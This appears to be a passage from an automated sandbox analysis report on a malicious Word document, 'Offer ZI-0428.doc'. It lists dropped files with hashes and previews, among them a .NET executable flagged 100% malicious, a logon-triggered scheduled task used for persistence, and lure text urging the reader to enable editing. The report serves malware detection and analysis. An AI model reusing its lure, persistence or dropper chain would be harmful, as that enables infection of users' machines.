                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):962
                        Entropy (8bit):5.012309356796613
                        Encrypted:false
                        SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                        MD5:14B479958E659C5A4480548A393022AC
                        SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                        SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                        SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                        Malicious:false
                        Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F52DFAFF-A539-4ACA-94D5-73AB65B148AA}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:CE338FE6899778AACFC28414F2D9498B
                        SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                        SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                        SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7457924-607A-4217-B8C5-EA0D2AF670E6}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1536
                        Entropy (8bit):1.3586208805849453
                        Encrypted:false
                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb7:IiiiiiiiiifdLloZQc8++lsJe1MzM
                        MD5:24B73117D7FC50947F82B8E1280385CA
                        SHA1:8F9CDF74F8889DFD9019C73F6E1BEDD61C115DFA
                        SHA-256:F78AB2175108174B9BBE4A8984007A6CEAE0689C8146D6A14882A7733A075BE4
                        SHA-512:5DE63A23EA17DA1DBE64F715B4D6C7C836A602F446F76918DCE6BEC85D378AD2620074085F4CC1858E8702C375DDACB3FF722F12533A9439EC3B7E10F518A026
                        Malicious:false
                        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CF583F95-7609-4E1F-A174-F1680B97C881}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):175616
                        Entropy (8bit):3.421465675373316
                        Encrypted:false
                        SSDEEP:3072:jyemryemryemryemryemryemryemryemryemryeme:jyemryemryemryemryemryemryemryeR
                        MD5:BC2C80DAA26F558C64A7799781EACC62
                        SHA1:A3EE9DD5888A82E1C50227545631989DBCA858DD
                        SHA-256:C5F4AC71D59D8923373DED6F933696956EC8F1DF532756A9B7DFC0AA91AD36BE
                        SHA-512:11F3ED194C5496E4C2BB68E04D76CF637DB864D7EDE13159510BBA3B699EC7449F9181ABBDA1216024148485063181D7388C5BB179C2D8C3C76CBABCFB4898F4
                        Malicious:false
                        Preview:3.1.6.4.2.4.6.7.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5181AA1-4E9C-4A6F-AAB0-9D832B2C367F}.tmp

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\4sl1mtby.pjr.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\auxtjoth.pin.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\bhvEBA7.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x00b00502, page size 32768, DirtyShutdown, Windows version 6.1
                        Category:dropped
                        Size (bytes):21037056
                        Entropy (8bit):1.1390562282693195
                        Encrypted:false
                        SSDEEP:24576:bO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:bOEXs1LuHqqEXwPW+RHA6m1fN
                        MD5:85A50A338DB39FAFE4D0635B2508F61B
                        SHA1:5356E89C810B1A66B2EAAE98CA8E432C8BB62C67
                        SHA-256:54C21215A1BD250FBB3880A516275771A96A45D01CFE1672BA308F514B501F7F
                        SHA-512:0F7C6AE30A56561386C297E9FD1D70F5C2102FB03520EDFA6F4CC65B9A6D85CACDB66DCD67BC03C4E764A80A379962286FBEFCEB96DC1C693321C0D24F855FBB
                        Malicious:false
                        Preview:....... ........................u..............................;:...{..::...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..

                        C:\Users\user\AppData\Local\Temp\i043pby4.4cw.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\mbpd2rhl.vaf.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\ojmi2tei.nbk.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\rq3hq4zb.fzt.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\tmpE15.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1577
                        Entropy (8bit):5.109987849101395
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtmxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTqv
                        MD5:C1E842B710AA83CA6DDDAE6327FE93F6
                        SHA1:E94B0E9263249D2C507268E09EB12FBC93A5786F
                        SHA-256:A4248378E1B208600EEDF5C2DADD6CE6B1EC5012DA9C37D0E14175A0871FDBDC
                        SHA-512:303B473FA469FC872CC9A46DF828FDB448D602FE7EEC0608ED4F51692CB7C035638B5F710F587158A273BE8793E015F582E074E1FC0431DD57B0A3162CE0BC5C
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                        C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1577
                        Entropy (8bit):5.109987849101395
                        Encrypted:false
                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtmxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTqv
                        MD5:C1E842B710AA83CA6DDDAE6327FE93F6
                        SHA1:E94B0E9263249D2C507268E09EB12FBC93A5786F
                        SHA-256:A4248378E1B208600EEDF5C2DADD6CE6B1EC5012DA9C37D0E14175A0871FDBDC
                        SHA-512:303B473FA469FC872CC9A46DF828FDB448D602FE7EEC0608ED4F51692CB7C035638B5F710F587158A273BE8793E015F582E074E1FC0431DD57B0A3162CE0BC5C
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                        C:\Users\user\AppData\Local\Temp\ucr5k3c5.s1u.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Local\Temp\vkidhas2.ame.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Offer ZI-0428.LNK

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:11 2023, mtime=Fri Aug 11 15:42:11 2023, atime=Mon Jul 1 10:57:56 2024, length=300804, window=hide
                        Category:dropped
                        Size (bytes):1029
                        Entropy (8bit):4.546351453929082
                        Encrypted:false
                        SSDEEP:12:8y4zQ3gXg/XAlCPCHaXFKBGbgB/qPX+WmOXsLQ4icvbhn64oL4DtZ3YilMMEpxRJ:8y4zS/XT1KQM4UxmecMDv3qEk7N
                        MD5:F4FAFD5D33CE07F62CB75BB96C779948
                        SHA1:FC1CF89926B41A1D1C40225D142F681A1B9348C4
                        SHA-256:25EAAAE64059952D59D3496CF13B4A5FAB9A2A701A31D58EE6751A841BE6925D
                        SHA-512:AE193E428EAD139F4C8E4E18E9B67942C3ED9FFD4407BF00B4F5E10A9CD945D3590713827E9FAC9F59D2F5570699546376EC4E0E80F2302A59B5B21F8CCDF31A
                        Malicious:false
                        Preview:L..................F.... .....k.r.....k.r....1D.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X:_..user.8......QK.X.X:_*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2......X=_ .OFFERZ~1.DOC..P.......WF..WF.*.........................O.f.f.e.r. .Z.I.-.0.4.2.8...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\992547\Users.user\Desktop\Offer ZI-0428.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.f.f.e.r. .Z.I.-.0.4.2.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......992547..........D_....3N...W...9.W.e8...8.....[D_....3

                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [folders]
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.588233670962456
                        Encrypted:false
                        SSDEEP:3:M14DAVJulm4QcVJulv:MGDAVgicVg1
                        MD5:AA80BC6B1891EA3CFDD6E0F3081E13E3
                        SHA1:797395F81E78F658237C4A558178AFEC8AB3A9C5
                        SHA-256:CE38CABD7AE29945F42C3863A778B1FC505817A13E595D54451AE312C89608CF
                        SHA-512:7BFC3AC88B87C9401FEC9997969BE81203D8895E1AF2F615ACB384965710AF1A3AD3C044A7E09E56596472B5C2848AED902407F34E24062394366BBE00354495
                        Malicious:false
                        Preview:[doc]..Offer ZI-0428.LNK=0..[folders]..Offer ZI-0428.LNK=0..

                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVygGlTJbyL0KllVMWpxi/NctOlln:vdsCkWthKKXxitl
                        MD5:23BAE74EC6AC87E5A629AAB97C6FED07
                        SHA1:A1EE321EAD9491E2401D3725985F7681DBC0EC5A
                        SHA-256:0C2909E4EE83AF17A6320F1DAB9F2D1BA5C4C001972DAB07C7F092B081564E9D
                        SHA-512:197A202D4AE7DD5D171CA60DBAA3E08492FF38200DF7DBF285BAA718D2E85D4533B99397D70D17BEFC5C87FE131AFD893970121032E24197D40AE19B0036FF43
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                        C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                        Category:dropped
                        Size (bytes):2
                        Entropy (8bit):1.0
                        Encrypted:false
                        SSDEEP:3:Qn:Qn
                        MD5:F3B25701FE362EC84616A93A45CE9998
                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                        Malicious:false
                        Preview:..

                        C:\Users\user\AppData\Roaming\plugman23456.scr

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....

                        C:\Users\user\AppData\Roaming\znlzneAxBVd.exe

                        Download File
                        Process:C:\Users\user\AppData\Roaming\plugman23456.scr
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1140744
                        Entropy (8bit):7.950319983509765
                        Encrypted:false
                        SSDEEP:24576:VcNkX126Z/zxDzTVt8Pyt1KjrJonp0+M+gw/gvXIw/qbw4:NX126zxvxt8P0IepJM+Tzk4
                        MD5:28F77C9AF8CB3EA886714BBFC8326635
                        SHA1:F6F02B22CD5A272C71A5AFA66EFD3B237FE4F24F
                        SHA-256:F251FE71103EF7BC4CBDBCFE9C1D7C4A595F831E51CF4064F2BFA595F47BDA35
                        SHA-512:03508E0F3F68696F4F7B64AA737D40E8BD24B69EA7860A8FABEE997D238454929605FE5B1EA0880AF14CF3A89763D46E1FDEB9A526700D570B0D672330B5F82D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..............3... ...@....@.. ....................................@.................................L3..O....@...............2...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......0..............@..B.................3......H............\......2...|....Q..........................................^..}.....(.......(.....*.0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....(......{.....o......{....( ...o!.....{.....o".....{....o#....o$.....{....o#...( ...o%.....{.....o&.....{.....r...po'...t....o(.....{.... B....6s)...o*.....{....r...po+.....{.... >... ?...s,...o-.....{.....o......{.....o/....."...@"..PAs0...(1......(2......r1..po'...t....o3......o".....

                        C:\Users\user\Desktop\~$fer ZI-0428.doc

                        Download File
